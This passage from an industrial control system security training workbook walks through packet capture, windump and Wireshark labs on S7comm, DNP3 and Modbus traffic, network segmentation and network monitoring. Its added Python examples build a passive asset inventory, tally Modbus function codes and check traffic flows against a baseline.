become ready.

Packets and protocols


Packets
If we are going to look closely at protocols, we will need packets to examine. Packets are the pieces of
data that make up the network traffic. How does one collect these packets? There are two very common
approaches for collecting packets:
 Switched Port Analyzer (SPAN) is a feature of managed network switches. Since switches are
already in place in networks, this feature can be used temporarily, or sometimes permanently.
 Network Test Access Points (TAPs) are devices that passively relay traffic and copy it to a
monitor port. These are much simpler devices, and they can be placed strategically in specific
places. TAPs are useful where devices do not meet at a common network switch.

SPAN ports
SPAN is a very typical method to collect packets. Ask the IT admin of a core network switch to
temporarily enable a mirroring (SPAN) port. This port will transmit a copy of every packet traversing the
other ports of the switch. Depending on the switch, you can selectively choose which source ports to
mirror, or even which specific VLANs. You do not always have to choose every port. The more specific
the selection, the more relevant the packets you collect from the SPAN port will be, and the less likely
the SPAN port is to be oversubscribed.

[Figure: switch with a SPAN port mirrored to the capture NIC]

Advantages:
 Multiple SPAN ports on most managed switches
 Gain visibility into what is on the LAN and WAN
 Inexpensive
 Flexible
 Remotely configurable
 Capture intra-switch traffic

Limitations:
 Oversubscription if sending data from multiple ports
 Packets can be dropped if ports are oversubscribed
 Latency – can distort real-time communications
 Captures not admissible in court
 Not passive – can degrade performance
 Could be inadvertently misconfigured
 Can be hacked if attacker gains access to switch

TAP/transparent bridge
Sometimes control systems are not connected to a common switch. In such cases, there are methods
to put a computer in-line between two devices: set up a network bridge so the computer operates as a
transparent device between them, and capture the packets at the bridge interface, which is a software
interface inside the computer representing the two real interfaces. Another approach based on the
same concept is a hardware network TAP. These can be more costly, and can optionally be left in-line.

Advantages:
 Packets not dropped, no oversubscription issue
 Doesn’t alter time relationships
 Captures ARE admissible in court
 Zero configuration
 Fail open if there is an issue
 Secure – not easily hacked
 No added latency or altered timings
 Includes network errors in addition to good frames/packets

Limitations:
 Must go in-line – installation requires network downtime
 Added cost
 Downtime to install and move
 Power failure – ensure fully passive TAP
 Fully passive is only possible on optical connections and on 10/100 Mbit copper connections

SPAN and TAP placement
 What do you want to secure?
 Which assets are critical?
 What network locations are high risk?
 Is the Internet a security concern?
 What data do you need to see?
 Who has access to critical assets?
 What SCADA/ICS devices are present?
 Are policy violations important?
Virtual Machine
In some cases the system you need to see is a virtual machine. In this case neither a SPAN nor a TAP
on the physical network may help.
The software switch between the virtual machines and the physical network hardware can be configured
to bridge the packets across the physical interface; dump the packets at that physical interface. Note that
traffic between two virtual machines on the same host never reaches the physical interface, so for that
you need the virtual switch’s own mirroring feature (for example a promiscuous-mode port group or a
vSwitch port mirror).

Protocols
Once packets are captured from the Control System network, it will be time to examine them.
What are we looking for?
Many networks use Ethernet as the lower-level base. Other network types exist. These are lower-level
examples, which can all be represented with packets.
Above the lower layers are common protocols that ride on top of them, for example IP and then TCP or
UDP. These middle-layer protocols wrap and deliver the protocols placed on top of them.
Finally come the more interesting protocols in the upper layers. This is where we will find control
system protocols. They are carried to us by the middle layers, and those layers are carried to us by the
lower layers. Each of the layers described here can be viewed in packets, all sandwiched together. We
will use tools to help us visualize this layering.

Packets and protocols demonstration using Windump:


Take any notes from the online demonstration: ____________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________

Packets and protocols activity #1


Discover potential ICS packets. Explore a pcap file containing ICS network traffic. The
purpose of this exercise is to become familiar with a common tool for exploring
captured packets. There are many advanced tools for evaluating network traffic. How
do those tools work? By using windump, we gain a better understanding of what takes place at the low
levels. When evaluating a network, we need to be capable of understanding normal packet activity.
NOTE: This exercise is done virtually using Netlab. Before completing this exercise, view the Netlab
“How to” video located in this course.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid closing your VLP session.
2. Login and schedule a reservation for the Learning Objective 3: ICS Connectivity - Protocols
Activity 1.
3. Enter your reservation.

4. Follow the instructions listed below.

Lab Settings
The information in the table below will be needed in order to complete the lab. The task sections
provide details on how to use the information listed below.
Virtual Machine IP Address Account (if needed) Password (if needed)
Windows10 vmuser vmuser

To begin the exercise, click the Windows10 icon in the diagram or on the tab listed at the top, then
enter the password from table above.
Lab 1
1. Using windump requires the command line. It is not a graphical utility. To open a terminal to the
Windows command line, click the “Command Prompt” icon in the task tray. Maximize the
window.
2. You will see a blank terminal open. Type windump to confirm the tool is available. (With no
arguments windump starts a live capture on the default interface; press ctrl-c to stop it.)
3. Navigate to the Desktop directory.
cd Desktop
4. In here, you can run the dir command to confirm the demo1 folder is present.
dir
5. Next, navigate to the demo1 folder.
cd demo1
6. Once here, you can run windump to blindly explore the pcap.
windump -r demo1.pcap
7. The above command will cause the terminal to print every packet in the pcap file. This is too
much to look through by hand. If it is still running, cancel the output.
ctrl-c
8. Let’s check for interesting port numbers – ones that may likely be Control Systems traffic.
windump -r demo1.pcap port 102
9. It seems something here is using Port 102, which is a possible sign of ICS related traffic, as
S7comm uses Port 102.
10. Try the above command again but replace 102 with different port numbers. Access the TCP
Ports used by PLCs document in Appendix C for a list of common Port numbers. See if you can
find other ICS related traffic. If windump prints lines, you have found more traffic. Keep looking
for different port numbers.

Consider: Just because you find traffic with a port number matching ICS protocols does not
necessarily confirm the existence of ICS traffic. Closer evaluation will be needed.
11. Let’s take a closer look at a specific host we saw using Port 102. We can isolate the host by IP.
windump -r demo1.pcap host 192.168.60.1
Notice this host is repeatedly communicating with Port 20000 on the host at 192.168.60.130.
This is a common port for the DNP3 protocol. In such a case, one side would be the client (master),
and the other would be the control system device itself. How can windump show us which one is the
control system device? Look at the “>” between the two addresses on each line: it points from
source to destination. This output shows that 192.168.60.1 is sending from ephemeral (randomly
assigned) source ports, and always toward 192.168.60.130, which is listening on Port 20000. This is
good evidence that 192.168.60.130 is a control system device operating with the DNP3 protocol (an
outstation), and that 192.168.60.1 is the master polling it.

What other ICS related port numbers did you find? List them below.
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________

End your reservation and return to the learning portal to continue with the next video.
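The inventory that GrassMarlin builds in the Identify Assets exercise and the “>” direction reading in step 11 above are both mechanical once you can read a pcap. The following Python is an added example for this guide; it is not course material and not GrassMarlin or windump. It builds a small pcap in memory (constructed addresses and MACs, so it runs offline), peels each frame layer by layer (Ethernet, IPv4, TCP/UDP) as described under Protocols, and lists, per host, the MACs seen and the ICS services it appears to serve, using the rule that the side on the well-known port is the device and the side on the ephemeral port is the client. The port-to-protocol table is an assumption in the spirit of Appendix C; a port match is a hint to investigate, not proof of ICS traffic.

```python
"""Passive asset discovery from a pcap: hosts, MACs, and which side of each
conversation looks like the control-system device.

Added example for this trainee guide; not course material, not GrassMarlin
or windump.  The traffic below is constructed so the script runs offline.
"""
import struct
from collections import defaultdict

# Well-known ports of common ICS protocols (assumed table; TCP unless noted).
ICS_PORTS = {
    102: "S7comm (ISO-TSAP)",
    502: "Modbus/TCP",
    20000: "DNP3",
    44818: "EtherNet/IP",
    47808: "BACnet/IP (UDP)",
}


def _frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, proto=6):
    """Build one Ethernet/IPv4/TCP-or-UDP frame (checksums left zero; fine for a pcap)."""
    if proto == 6:   # 20-byte TCP header, PSH|ACK, no payload
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    else:            # 8-byte UDP header, no payload
        l4 = struct.pack("!HHHH", sport, dport, 8, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split("."))) + l4
    eth = bytes.fromhex(dst_mac.replace(":", "")) + bytes.fromhex(src_mac.replace(":", "")) + b"\x08\x00"
    return eth + ip


def build_sample_pcap():
    """Constructed traffic: one client polling three devices (addresses and MACs made up)."""
    pc, plc_a, plc_b, bac = "00:50:56:00:00:01", "00:1c:06:00:00:30", "00:0e:8c:00:00:31", "00:40:ae:00:00:32"
    frames = [
        _frame(pc, plc_a, "192.168.60.1", "192.168.60.130", 49152, 20000),           # DNP3 poll
        _frame(plc_a, pc, "192.168.60.130", "192.168.60.1", 20000, 49152),           # DNP3 reply
        _frame(pc, plc_a, "192.168.60.1", "192.168.60.130", 49153, 102),             # S7comm, same device
        _frame(pc, plc_b, "192.168.60.1", "192.168.60.131", 49154, 502),             # Modbus/TCP
        _frame(pc, bac, "192.168.60.1", "192.168.60.132", 49155, 47808, proto=17),   # BACnet over UDP
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # global header, LINKTYPE_ETHERNET
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f   # record header + frame
    return out


def parse_pcap(data):
    """Yield raw frames from a classic (non-pcapng) pcap in either byte order."""
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(struct.unpack_from("<I", data, 0)[0])
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack_from(endian + "I", data, 20)[0] != 1:
        raise ValueError("only the Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        incl = struct.unpack_from(endian + "IIII", data, off)[2]   # captured length
        off += 16
        yield data[off:off + incl]
        off += incl


def decode(frame):
    """Peel Ethernet -> IPv4 -> TCP/UDP headers; return None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None   # ARP, VLAN-tagged, IPv6 ... are skipped in this example
    dst_mac, src_mac = frame[0:6].hex(":"), frame[6:12].hex(":")
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    src_ip = ".".join(str(b) for b in frame[26:30])
    dst_ip = ".".join(str(b) for b in frame[30:34])
    l4 = 14 + ihl
    sport = dport = None
    if proto in (6, 17) and len(frame) >= l4 + 4:
        sport, dport = struct.unpack_from("!HH", frame, l4)
    return src_mac, dst_mac, src_ip, dst_ip, proto, sport, dport


def inventory(pcap_bytes, ics_ports=ICS_PORTS):
    """Per-host view: MACs seen, ICS services it appears to serve, devices it polls."""
    hosts = defaultdict(lambda: {"macs": set(), "likely_serves": set(), "polls": set()})
    for frame in parse_pcap(pcap_bytes):
        d = decode(frame)
        if d is None:
            continue
        src_mac, dst_mac, src_ip, dst_ip, _proto, sport, dport = d
        hosts[src_ip]["macs"].add(src_mac)
        hosts[dst_ip]["macs"].add(dst_mac)
        # Direction rule from Activity #1: the side on the well-known port is the server
        # (the field device); the side on an ephemeral port is the client polling it.
        if dport in ics_ports:
            hosts[dst_ip]["likely_serves"].add((dport, ics_ports[dport]))
            hosts[src_ip]["polls"].add((dst_ip, dport))
        elif sport in ics_ports:          # the reply direction
            hosts[src_ip]["likely_serves"].add((sport, ics_ports[sport]))
            hosts[dst_ip]["polls"].add((src_ip, sport))
    return dict(hosts)


if __name__ == "__main__":
    for ip, info in sorted(inventory(build_sample_pcap()).items()):
        print(ip, sorted(info["macs"]), "serves:", sorted(info["likely_serves"]), "polls:", sorted(info["polls"]))
```

Against the lab capture you would pass the file contents (`inventory(open(path, "rb").read())`) instead of `build_sample_pcap()`. Non-IPv4 frames (ARP, VLAN-tagged, IPv6) and pcapng files are deliberately skipped here; in an ICS network that matters, because some protocols are not IP-based at all, and a device that only ever speaks a non-IP protocol will be missing from this table and still needs to be found another way.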

Packets and protocols demonstration using Wireshark:


Take any notes from the online demonstration: ____________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________

Packets and protocols activity #2
Discover functions of Modbus. The functions listed on the next page are normally carried inside
Modbus packets that are carried over an ICS network via the Modbus protocol.

Consider: Exploring the components of Modbus manually exposes you to the structure of the
protocol’s packet. Other protocols have different structures. When evaluating a network, seeing what
is normal provides awareness. You now are seeing what messages normally take place in this sample
of traffic. Doing this activity helps you become familiar with manually exploring a protocol in real
packets. This provides a baseline for when there is a need to troubleshoot a problem.

Lab 2
Note: This exercise is done virtually using Netlab. Before completing this exercise, view the Netlab
“How to” video located in this course.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid closing your VLP session.
2. Login and schedule a reservation for the Learning Objective 3: ICS Connectivity - Protocols
Activity 2.
3. Enter your reservation.
4. Follow the instructions listed below.

Lab Settings
The information in the table below will be needed in order to complete the lab. The task sections
provide details on how to use the information listed below.
Virtual Machine IP Address Account (if needed) Password (if needed)
Windows10 vmuser vmuser

To begin the exercise, click Windows10 in the diagram or on the tab listed at the top.
1. Open the demo2 folder on your Virtual Desktop. Double-click the demo2.pcap file. It will
automatically open into Wireshark. Attempt to find additional functions. Determine their function
ID number. You do not have to find every function. Some functions may not appear in the
provided pcap file.
When you find a function, you may find yourself scrolling through repeating events. Use Wireshark to
filter out the functions you have already discovered.
2. In the expression bar, type in the filter below for function Type 1. Change the 1 to any function
number you have already found. Press enter once the bar turns green. It will be red as you
type.
!(modbus.func_code == 1)
3. Function Type 1 will no longer appear. You can continue to add discovered functions as you go,
by using the && boolean.

!(modbus.func_code == 1) && !(modbus.func_code == 2)
4. Keep adding to the filter as you go!
5. Check the box next to the function name as you discover them.
6. Place the ID number in the blank next to the function name.
ID# ___ write_multiple_coils
ID# ___ write_multiple_registers
ID# ___ get_comm_event_counter
ID# ___ read_discrete_inputs
ID# ___ read_holding_registers
ID# ___ diagnostics
ID# ___ write_single_coil
ID# ___ write_file_record
ID# ___ read_coils
ID# ___ report_slave_id
ID# ___ read_exception_status
ID# ___ encapsulated_interface_transport
ID# ___ get_comm_event_log
ID# ___ read_input_registers
ID# ___ read_fifo_queue
ID# ___ read_write_multiple_registers
ID# ___ mask_write_register
ID# ___ write_single_register
ID# ___ read_file_record
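Steps 2 through 4 above build the exclusion filter by hand, one function code at a time. The script
below is an added example, not part of the course materials: it reads the Modbus/TCP framing that
Wireshark decodes for you (the 7-byte MBAP header followed by the one-byte function code), tallies
the codes seen in a set of constructed frames, and produces the same `!(modbus.func_code == N)`
filter string for everything already discovered. The frames are constructed for the example and are
not from demo2.pcap; the code numbers are left for you to match against the checklist.

```python
import struct

# Constructed Modbus/TCP frames (MBAP header + PDU), not from demo2.pcap.
# MBAP layout: transaction id (2), protocol id (2, always 0), length (2) =
# number of bytes that follow, unit id (1); the PDU then starts with the
# function code (1). Spaces below only group the fields for readability.
FRAMES = [
    bytes.fromhex("0001 0000 0006 01 01 0000 0008".replace(" ", "")),  # request, code 1
    bytes.fromhex("0002 0000 0006 01 03 0000 000a".replace(" ", "")),  # request, code 3
    bytes.fromhex("0003 0000 0006 01 01 0000 0008".replace(" ", "")),  # code 1 again
    bytes.fromhex("0004 0000 0006 01 06 0001 00ff".replace(" ", "")),  # request, code 6
    bytes.fromhex("0005 0000 0003 01 83 02".replace(" ", "")),         # exception reply to code 3
    bytes.fromhex("0006 0000 0005 01 2b 0e 01 00".replace(" ", "")),   # request, code 43
]


def parse_frame(frame):
    """Split one Modbus/TCP frame into its MBAP fields and function code."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, pid, length, unit, func = struct.unpack(">HHHBB", frame[:8])
    if pid != 0:
        raise ValueError("protocol id %d is not Modbus" % pid)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d does not match frame size" % length)
    # A set high bit marks an exception response; the low 7 bits still name
    # the function the device refused, so that is what we tally.
    return {
        "tid": tid,
        "unit": unit,
        "func": func & 0x7F,
        "exception": bool(func & 0x80),
        "data": frame[8:],
    }


def function_codes(frames):
    """Return {function_code: count} over the frames, exceptions included."""
    counts = {}
    for f in frames:
        code = parse_frame(f)["func"]
        counts[code] = counts.get(code, 0) + 1
    return counts


def exclusion_filter(codes):
    """Build the Wireshark display filter that hides already-discovered codes."""
    return " && ".join("!(modbus.func_code == %d)" % c for c in sorted(codes))


if __name__ == "__main__":
    seen = function_codes(FRAMES)
    for code, n in sorted(seen.items()):
        print("function code %d seen %d time(s)" % (code, n))
    print("filter to hide them:", exclusion_filter(seen))
```

Paste the printed filter into the expression bar exactly as step 2 describes; each new code you
discover is one more `&& !(modbus.func_code == N)` term.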

1. Among the discovered functions, which ones appeared frequently? ______________________
___________________________________________________________________________
___________________________________________________________________________

2. Among the discovered functions, which ones did not appear frequently? __________________
___________________________________________________________________________
___________________________________________________________________________

3. Did any functions appear as unknown? ___________________________________________
___________________________________________________________________________
___________________________________________________________________________

4. Does the packet structure following the Function Code appear different for each? __________
____________________________________________________________________________
____________________________________________________________________________


End your reservation and return to the learning portal to continue with the next video.

Discover undesired activity demonstration


Take any notes from the online demonstration:
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________
___________________________________________________________________________

Network segmentation demonstration
A control system can exist on a single network. However, that may not be the wisest design plan. It is a
single network to target. Instead of a single network, smaller networks connected by routes, performed
by routers or firewalls, can provide barriers with rules. This is a common concept in network security.
Network security can be applied to control system networks.

Let’s look at a simple network, built with no segmentation. This is a relatively simple ICS network:
a couple of PLCs driving some factory equipment, a pair of HMI stations to operate from, and a
Historian collecting data from the operation and storing it to a server for safe keeping. This is a
single network. Nothing is segmented. All devices above and below the network pipe are connected
to the same low-level network.

Over time, more devices become needed or desired. This company adds some engineering
workstations for new crew positions. Policies are implemented that require more security, resulting
in new IP surveillance equipment. Where do these new devices connect? The company just adds them
to the existing network.

Production is going well. More workforce is needed. New employees will need desktop computers.
To serve the various departments, an IP phone system is deployed.

A dedicated IT staff is eventually needed. To support staff, a Domain Controller is set up and
integrated with desktops and equipment. Employees need to store and exchange a variety of files on
a File Server. Being able to view the data from production can be complicated, so IT creates a web
server to make it presentable in visually appealing dashboards. The data for the dashboards is
pulled from the Historian database.

More advanced OT equipment is needed in manufacturing. New components are deployed, resulting in
more servers and operation client terminals.

Finally, the employees are going to need Internet access for communicating with businesses. All
these additions are added to the same base network we started with. It is getting crowded on this
network. Our network is singular, and now only 1 device isolates this Control System from the
public Internet.

The resulting network appears rather crowded:
• Forward or reverse attacks need only circumvent one point
• Difficult to control access across employee positions
• Troubleshooting may be challenging
• Difficult to grow
Let’s attempt to segment this…but how?

There is no single answer for how to segment such a network. Below is one idea. It is an architecture
design provided by DHS. Dividing networks into zones can assist in creating security boundaries.
Understanding how to segment networks is vital to creating architectural zones within and around
control system environments.
The basic idea is to introduce a DMZ between IT and OT operations. This idea can be applied in
multiple areas of the same production, depending on needs. It creates the ability to introduce access
control between segments. Not all segmenting ideas require placing a DMZ buffer between them.
Debate over the relevance of the Purdue Model does exist. Depending on your organization’s design
needs, the model may carry more or less weight in that debate. Regardless, using it can still be a first
step in further improving your security model. It can also be a great introduction for someone who has
never experienced Network Segmentation.

Looking back at the same network we saw grow, we attempted to segment this into smaller, more
controllable zones. When evaluating a network, you may or may not encounter similar designs.

Critical Data Points
With a segmented network design, we can more easily add new components to the network. These
new components now have an appropriate location where they can be placed.
A production network will have data paths throughout itself. These paths can be critical points for data
to traverse.

A security officer can monitor last night’s surveillance video, which was delivered to video storage.

Note the direction of the arrows indicating which device is initiating the connection, and where it is
going for access. In other words, the video footage is not pushed from the Production network to the
engineering workstation. It is accessed via the access controls available in the segmented networks.
These data paths traverse firewalls with access rules.
Historian data are sent to another Historian to mirror the data. A backup is replicated for long-term
storage.

An engineer monitors the past week’s results from production by accessing a web server. The web
server accesses the database mirror for the engineer’s queries. It does not query the primary Historian
in the Production network. The web server can do this, even though the networks have been
segmented.

Logical vs. physical location: when reading this map, the segments do not necessarily suggest
physical placement. Note the colored highlights and the matching physical room names. When reading
our network segmentation map, this illustrates how different hosts connected to a common segment
are not necessarily in the same room next to each other.

The above are achieved more realistically by implementing Network Segmentation.

Real-world segmentation example #1:
Ukrainian Kyivoblenergo Power Grid, December 23, 2015
• Open-source information available from RTU vendors.
• VPNs (plural) into the ICS network lacked multi-factor authentication.
• Firewall allowed egress, aiding remote connectivity.
• No network security monitoring.
Result: Power interruptions to 225,000 customers, across various locations.

Real-world segmentation example #2:
RWE AG Power Plant, April 26, 2016 (media reported)
• Infected with W32.Ramnit and Conficker
• USB drives also discovered, containing copies of the same malware.
• Infected ICS hosts were on normally isolated networks.
• Infected Office hosts, passing the USB drives, were also on isolated networks.
Result: Lack of Internet connectivity for the ICS segments rendered the infection harmless.
Cybersecurity increased upon discovery, without being overwhelmed.

Network segmentation exercise
Review the network diagram on the next page. If you were given this map in an evaluation situation,
what ideas come to mind? Answer the questions below. There are no right or wrong answers.

Consider: Rather than designing a perfect ICS network, simply try to consider a model that may offer
potential for more access control, efficiency, and growth. You are learning to evaluate a situation.
Reviewing bad ideas is a great way to notice them.

Does the design implement any segmentation?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
Do you see any critical data points?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
Are some devices arguably in the wrong network?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
If a particular host was compromised, are there sensitive devices nearby in the same network
segment?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
What are top concerns that stand out to you?
__________________________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
If you were to segment this network further, what would you create? Use the blank space on the
following page to draw and label your ideas for further segmenting this network. Remember, there is
no right or wrong answer. Simply trying is a great way to start.

Return to the learning portal and continue with the next video.

Network segmentation exercise recap
Take any notes from the recap: ______________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________

Packets, protocols, and segmentation recap

Evaluation questions
During this step, you can ask the following questions to identify any gaps.
• Are dependencies and critical functions for delivery of critical services established?
• Does the control system enforce assigned authorizations for controlling the flow of information
within the system and between interconnected systems in accordance with applicable policy?
• Does your organization configure the control system to provide only essential capabilities and
specifically prohibit and/or restrict the use of functions, ports, protocols, and/or services as
defined in an organizationally generated "prohibited and/or restricted" list?
• Is a cybersecurity architecture in place to enable segmentation, isolation, and other
requirements that support the cybersecurity strategy?
• Is a cybersecurity defense-in-depth architecture implemented?
• Is a strategy to architecturally isolate the organization's IT systems from OT systems
implemented?
• Is architectural segmentation and isolation maintained according to a documented plan?
• Is the network segmented based on the label or classification level of information stored on
servers?

Cybersecurity plan mapping

Common issues/findings
• Existing staff has the technical capacity to operate the existing implementation, but not to
recreate it.
• Staff does not have detailed knowledge of Control System network traffic.
• Packets are believed to be captured for analysis but are not being captured correctly.
• Documentation struggles to exist, due to continued irregular adjustments to the existing
design.
• The Purdue model, or similar segmentation, is not observed in the network.
• Public traffic can be accessed from OT-based network hosts.
• Critical data points are not understood.
• Restarting a system is the only known solution to combating a critical data flow issue.
• Fear of debugging systems exists across the IT and OT staff.

Learning Objective 4
Evaluate network monitoring capabilities
Monitoring systems and networks for changes, anomalous behaviors, or attack signatures can be
difficult in an ICS environment; however, monitoring and detection capabilities are essential to the
defense-in-depth concept of protecting critical assets. In this objective (remaining in Step 3) we
reinforce the importance of network monitoring and how you can evaluate your network using its
capabilities.

“The collection, analysis, and escalation of indications and warnings to detect and respond to
intrusions. NSM is a way to find intruders on your network and do something about them before they
damage your enterprise.”
- The Practice of Network Security Monitoring
Having an electronic boundary around the ICS is not sufficient to protect critical assets from
unauthorized access. This is true because for each protection put into place in a network environment,
threat actors can find a method around it.
ICS environments provide a unique opportunity when considering protection mechanisms to place on
the network. Despite considerable network traffic, that traffic is very predictable. For example, in a
typical ICS environment, the PLC communicates in a standardized way with the HMI and the historian;
all applications and services on the process control system (PCS) network are known (or should be);
and the protocols, web traffic, and proprietary traffic are known and predictable.
Asset owners can use an intrusion detection system (IDS) solution to easily monitor and create alarms
for any traffic outside normal operations. An IDS is based on the passive monitoring of network traffic.
Expected network traffic is deterministic, and deviations are used as triggers for alerting. Simple rules
can be written to monitor for IP sources and destinations, protocols, lengths of packets, etc.
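The "expected traffic is deterministic" idea above, and the segmented data paths described earlier
(video pulled by the engineering workstation rather than pushed from Production; the web server
querying only the Historian mirror), come down to the same check: a short list of permitted
conversations, stated by zone and by which side initiates, with everything else raised as an alert.
The script below is an added example, not part of the course materials or of any IDS product. The
zone subnets, ports and flows are constructed for the example; in practice the initiator of each flow
is the host that sent the first SYN, which is what the windump exercise earlier taught you to read.

```python
import ipaddress

# Constructed zone map for the example (not the course's diagrams).
ZONES = {
    "control":    ipaddress.ip_network("192.168.60.0/24"),   # PLCs, RTUs, HMIs, primary historian
    "ics_dmz":    ipaddress.ip_network("10.10.20.0/24"),     # historian mirror, video storage
    "enterprise": ipaddress.ip_network("10.0.0.0/16"),       # web server, engineering workstations
}

# Baseline of permitted conversations as
# (initiator zone, responder zone, protocol, responder port). Direction is
# part of the rule: Production may push to the DMZ mirror, but nothing in
# Production may open connections outward to the enterprise network.
EXPECTED = {
    ("control", "control", "tcp", 502),        # HMI -> PLC (Modbus/TCP)
    ("control", "control", "tcp", 20000),      # DNP3 master -> outstation
    ("control", "ics_dmz", "tcp", 1433),       # primary historian -> mirror replication
    ("enterprise", "ics_dmz", "tcp", 1433),    # web server -> historian mirror
    ("enterprise", "ics_dmz", "tcp", 443),     # engineering workstation pulls video
}


def zone_of(ip):
    """Map an address to its zone name, or 'unknown' if it is outside all zones."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "unknown"


def check_flows(flows):
    """flows: iterable of (initiator_ip, responder_ip, proto, responder_port).

    Returns [(flow, reason)] for every conversation outside the baseline.
    """
    alerts = []
    for flow in flows:
        src, dst, proto, port = flow
        key = (zone_of(src), zone_of(dst), proto, port)
        if "unknown" in key[:2]:
            alerts.append((flow, "host outside any documented zone"))
        elif key not in EXPECTED:
            alerts.append((flow, "not in baseline: %s -> %s %s/%d" % key))
    return alerts


# Constructed flow summaries (initiator first), not from any course capture.
SAMPLE_FLOWS = [
    ("192.168.60.1", "192.168.60.130", "tcp", 20000),  # expected DNP3 polling
    ("10.0.5.20", "10.10.20.5", "tcp", 1433),          # web server -> mirror: expected
    ("10.0.5.20", "192.168.60.40", "tcp", 1433),       # web server -> primary historian: alert
    ("192.168.60.40", "10.0.5.30", "tcp", 445),        # Production pushing outward: alert
    ("203.0.113.9", "192.168.60.130", "tcp", 20000),   # undocumented host reaching outstation: alert
]


if __name__ == "__main__":
    for flow, reason in check_flows(SAMPLE_FLOWS):
        print("ALERT %s -> %s %s/%d: %s" % (flow + (reason,)))
```

The baseline is deliberately small; in an ICS environment it should be, and any growth in it is
itself something to review.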

Philosophies
“ … Know thy Network” (Rob Joyce, TAO, 2016)
“Defense is doable …” (Rob. M. Lee, Dragos)
“Logs are just data... Processed and analyzed, they become information. Put another way ... If a tree
falls on your network and it shows up in your logs and nobody is reading them – you’re still
squished!” (Marcus J. Ranum)
Network monitoring types
1. ____________ ________________ silently analyzes network traffic through a span port or tap
to identify endpoints and traffic patterns.
• NIDS/HIDS
• Full packet capture
• Centralized logging
2. ____________ ________________ works by sending test traffic into the network and polling the
endpoints that the traffic comes into contact with.
• Scanning – Nmap or Nessus
• PenTesting
• System Monitoring
• Policy based – Whitelisting, GPO, Tripwire, Fi
3. ____________ ________________ For an ICS to be successful, a hybrid monitoring solution is
needed. OT environments require both passive and active monitoring to be effective.
• Security information and event management (SIEM)
4. ____________________!!!

Logging architecture

• A central log server can assist in threat identification or incident investigation by providing a
chronological list of events – providing a more complete, bigger picture.
• Correlating with other logs can sometimes make the difference between recognizing an event for
what it is (true or false) and then acting accordingly.
• Physical Security logs can help to identify an insider threat that has physically accessed the
computer systems.

• In this example, we send our logs from the central control centers and field devices to an ICS
Log Server.
• The ICS Log Server forwards data to the Centralized Log servers.
• These Log servers should be placed in a high security area of the network.

Evaluation questions
• Does the organization deploy network-based IDS sensors and log servers on Industrial DMZ
systems and ICS networks that look for unusual attack mechanisms and detect compromise of
these systems?
• Does the organization deploy SIEM or log analytic tools for log aggregation and consolidation from
multiple machines and for log correlation and analysis?
• Are malicious code protection mechanisms used at system entry and exit points and at
workstations, servers, or mobile computing devices?

Network IDS monitoring demonstration


Draw the appropriate placement of the IDS Sensors from the demonstration on the image below.

Detection and monitoring
Monitoring control system
• Monitoring and management of control system
  • Devices, protocols, communications, user accounts, product/firmware versions, device
  settings
  • Host intrusion detection
  • Network intrusion detection
• Protection of control system
  • Boundary and security zone firewalls
  • Application Whitelisting
  • Compliance audit and change management
Evaluating network monitoring
• AU-6 - Audit Review, Analysis, and Reporting – consistently part of the top 20 for NCATS.
  a. Reviews and analyzes information system audit records at least on a weekly basis for
  indications of inappropriate or unusual activity; and
  b. Reports findings to organization-defined personnel or roles.
• Additional Guidance
  a. Process Integration
  b. Correlate Audit Repositories
  c. Integration of Scanning and Monitoring Capabilities
  d. Correlation of Physical Monitoring
• Policy needed to govern review of log data analysis
Network monitoring policy
• Log and Monitoring Policy should define:
  • Purpose of monitoring and logging
  • Who is responsible for audit logging and review?
  • Frequency of log and audit review
  • Requirements for system owners
  • Activities to be logged (Systems, Applications)
  • Format of logs and Storage
  • Protecting logs from risk
  • Administrative Responsibilities
• Who would you ask about your company’s policy?

Data
There are many data types and collection tools. A few of which are listed in the table below:

Log sources
Below are some commonly used logs, many of which are used in ICS environments. ICS vendors may
be able to provide additional information on application specific logs or third-party tools.

• Firewalls
• IDS Logs (Zeek and Snort)
• VPN Servers (may be part of Firewall logs)
• Operating Systems (e.g., Windows, *nix, Mac)
• Proxy Server
• Web Servers (e.g., IIS, Apache, Nginx)
• Databases (e.g., MS SQL, Oracle, MySQL)
• Other (e.g., PLCs, HMIs)
Snort rules for ICS vulnerabilities
Snort is an open-source deep packet inspection intrusion detection system (IDS) or intrusion prevention
system (IPS). Snort is widely used and has become the standard for IPS/IDS. Learning to write Snort
rules is useful because most IPS/IDS applications will either use the Snort rule format or provide a way
to import Snort rules.
